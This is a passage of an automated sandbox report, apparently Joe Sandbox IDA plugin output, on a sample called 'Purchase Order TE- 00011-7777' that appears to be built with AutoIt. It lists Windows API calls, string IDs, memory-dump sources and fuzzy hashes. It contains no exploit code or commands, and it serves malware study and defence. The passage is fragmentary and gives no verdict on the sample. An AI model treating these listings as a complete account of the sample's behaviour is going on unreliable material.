                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 3565006973-3941886329
                      • Opcode ID: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                      • Instruction ID: 6781de62abc386363d3392d34e65fc051c3efa0396bcacc9f8271a49525883d6
                      • Opcode Fuzzy Hash: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                      • Instruction Fuzzy Hash: 7A911774600701AFDB14DF68C884F6ABBF9BF49710B1585ADF94ACB291EB70E941CB60
                      APIs
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • __wcsnicmp.LIBCMT ref: 00ADE785
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ADE84E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: 392a66715ccde6240e4a93afa55e13e659005e3f57fcd5154d8967b15206762a
                      • Instruction ID: 1e825b852a1c720edc78d58f464aba1814e9f162bcdb6597e63e0388263f83ec
                      • Opcode Fuzzy Hash: 392a66715ccde6240e4a93afa55e13e659005e3f57fcd5154d8967b15206762a
                      • Instruction Fuzzy Hash: 19615E75A00215AFDB14EB98C995EAEB7F8EF49310F04406AF546AF391DB70AE80DB50
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00A91B83
                      • GlobalMemoryStatusEx.KERNEL32 ref: 00A91B9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: d86de97fad2aa9b26eac79f42b453ec4cfeca96489e1106c058bef13f10eafd1
                      • Instruction ID: dced035544eadd9dd1f1afa8b9a494879275d2d1cf3c807f944d28f71384851c
                      • Opcode Fuzzy Hash: d86de97fad2aa9b26eac79f42b453ec4cfeca96489e1106c058bef13f10eafd1
                      • Instruction Fuzzy Hash: 94514871408745ABE720AF14D885BABBBE8FB9A354F81484DF1C8420A1EF75996C8763
                      APIs
                        • Part of subcall function 00A9417D: __fread_nolock.LIBCMT ref: 00A9419B
                      • _wcscmp.LIBCMT ref: 00ADCF49
                      • _wcscmp.LIBCMT ref: 00ADCF5C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscmp$__fread_nolock
                      • String ID: FILE
                      • API String ID: 4029003684-3121273764
                      • Opcode ID: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                      • Instruction ID: 27137a7d70cd1449fb87b4774a8c96f9a1d1035d73ce816425f2f33ee36156ad
                      • Opcode Fuzzy Hash: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                      • Instruction Fuzzy Hash: 8641C432A0421ABADF10DBA4CC81FEF7BBA9F49710F50046AF602E7291DB719A45C761
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00AFA668
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AFA67D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                      • Instruction ID: 495df1c1cf8f6bf678ac70507e2a9fb0cd9edceaecda027a911e450c53bb27d4
                      • Opcode Fuzzy Hash: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                      • Instruction Fuzzy Hash: B841F8B5A003099FDB54CFA8C981BEA7BB5FF19300F14446AEA09EB341D770A945CFA1
                      APIs
                      • _memset.LIBCMT ref: 00AE57E7
                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00AE581D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: eb0624f1e3218c59edd3b4a50474681d56d1808e4e278a55898bd12e418cc244
                      • Instruction ID: fbc702b0ffda2a71a75ca783e18ab294e1aa877368e170e7a018820ecc3d4e13
                      • Opcode Fuzzy Hash: eb0624f1e3218c59edd3b4a50474681d56d1808e4e278a55898bd12e418cc244
                      • Instruction Fuzzy Hash: 9F314871D01109ABCF11AFA1DD95EEEBFB8FF19314F104029F816A6162EB319A06DB60
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00AF961B
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF9657
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: b032040508ddb703691bd893c76f71cb92f3c2a2786875e884451e03eed7a84f
                      • Instruction ID: 570ac72de3f7bf71e022996fd8183b39cfe2308126f9df0deaa0c37e07cb1a08
                      • Opcode Fuzzy Hash: b032040508ddb703691bd893c76f71cb92f3c2a2786875e884451e03eed7a84f
                      • Instruction Fuzzy Hash: F9318D31500208AEEB109FA8DC80BFB77A9FF59764F008619F9A9C7190CB31AC91DB60
                      APIs
                      • _memset.LIBCMT ref: 00AD5BE4
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AD5C1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: c3560b84b971892192bd58d6afcc0d46ab8d393a8bf813b3e883e9f08422af89
                      • Instruction ID: e500cc9608bf6a9d41d8f52278c11fa0ef69ea8730db8ee5f687bc5bae517240
                      • Opcode Fuzzy Hash: c3560b84b971892192bd58d6afcc0d46ab8d393a8bf813b3e883e9f08422af89
                      • Instruction Fuzzy Hash: 5E31B931E10705ABDB25CFA8D985BEEBBF9EF05350F18001AE983972A1E7B09944CF10
                      APIs
                      • __snwprintf.LIBCMT ref: 00AE6BDD
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __snwprintf_memmove
                      • String ID: , $$AUTOITCALLVARIABLE%d
                      • API String ID: 3506404897-2584243854
                      • Opcode ID: 7355cedb8dfc60fe05b49c09ebd37a60bd1a96fdc2a64793678e9c95214f3358
                      • Instruction ID: d20e084104fc70c92cc342ea94a7a15bb29ef873bdb636e5a64bc56fc8335be0
                      • Opcode Fuzzy Hash: 7355cedb8dfc60fe05b49c09ebd37a60bd1a96fdc2a64793678e9c95214f3358
                      • Instruction Fuzzy Hash: F9218C31600218AACF10EFA5C982FAE77F5EF94B40F140895F545AB291DB70EE42CBA1
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF9269
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF9274
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                      • Instruction ID: ef506780229b0692c6e0568aab6a36f902cea0241d241478275a92690ca5bcea
                      • Opcode Fuzzy Hash: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                      • Instruction Fuzzy Hash: 7411607164020DBFEF25CF98DC81FFB37AAEB893A4F104125FA1897290D6719C518BA0
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • GetWindowRect.USER32(00000000,?), ref: 00AF9775
                      • GetSysColor.USER32(00000012), ref: 00AF978F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                      • Instruction ID: 25f0a4c5f316fd940285bbaa6a3382abea640dcb6237595f0a7e8f34de9ef7aa
                      • Opcode Fuzzy Hash: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                      • Instruction Fuzzy Hash: 2B113A72520209AFDB04DFB8CC45EFA7BB8EB08314F004929FA55E3150E735E851DB50
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00AF94A6
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AF94B5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                      • Instruction ID: cea23f0193ff4d33b2c71507428af38a4fdab51f5e14c5f68eec6bd039b25385
                      • Opcode Fuzzy Hash: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                      • Instruction Fuzzy Hash: C3112B71500208AAEB108FA89C45FFB3B69EB25375F504724FA65971E0C7759C529B60
                      APIs
                      • _memset.LIBCMT ref: 00AD5CF3
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AD5D12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 30b73b0a7b36c96991d814ca60f97a1f1ba6c488ef6fc400932169cf69342f77
                      • Instruction ID: a854de6b16e929465288ee2b0354a1bc8cebc8f60d320ac164b5059d468f13a3
                      • Opcode Fuzzy Hash: 30b73b0a7b36c96991d814ca60f97a1f1ba6c488ef6fc400932169cf69342f77
                      • Instruction Fuzzy Hash: B5119072D11618ABDB60DB7CD848B9977FAAB06744F180063ED92EB390D770AD04CBA1
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AE544C
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AE5475
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      APIs
                      • inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • htons.WSOCK32(00000000), ref: 00AEAD32
                      Strings
                      Similarity
                      • API ID: htonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 3832099526-2422070025
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ACC5E5
                      Strings
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      APIs
                      Strings
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ACC4E1
                      Strings
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ACC562
                      Strings
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      APIs
                      Strings
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ACB36B
                        • Part of subcall function 00AB2011: _doexit.LIBCMT ref: 00AB201B
                      Strings
                      Similarity
                      • API ID: Message_doexit
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 1993061046-4017498283
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 00B0BAB8
                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B0BCAB
                      Strings
                      Similarity
                      • API ID: DirectoryFreeLibrarySystem
                      • String ID: WIN_XPe
                      • API String ID: 510247158-3257408948
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF849F
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF84B2
                        • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Strings
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF84DF
                      • PostMessageW.USER32(00000000), ref: 00AF84E6
                        • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Strings
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461